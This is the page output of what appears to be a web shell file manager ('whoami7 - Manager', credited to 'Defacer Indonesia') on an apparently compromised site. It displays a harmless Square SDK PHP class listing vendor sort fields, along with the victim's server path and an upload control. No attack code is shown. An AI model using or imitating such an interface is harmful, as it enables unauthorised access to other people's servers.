whoami7 - Manager
:
/
home
/
qbizpnmr
/
arif.umairtax.com
/
vendor
/
square
/
square
/
src
/
Models
/
Upload File:
files >> /home/qbizpnmr/arif.umairtax.com/vendor/square/square/src/Models/SearchVendorsRequestSortField.php
<?php declare(strict_types=1); namespace Square\Models; /** * The field to sort the returned [Vendor]($m/Vendor) objects by. */ class SearchVendorsRequestSortField { /** * To sort the result by the name of the [Vendor]($m/Vendor) objects. */ public const NAME = 'NAME'; /** * To sort the result by the creation time of the [Vendor]($m/Vendor) objects. */ public const CREATED_AT = 'CREATED_AT'; }
Copyright ©2021 || Defacer Indonesia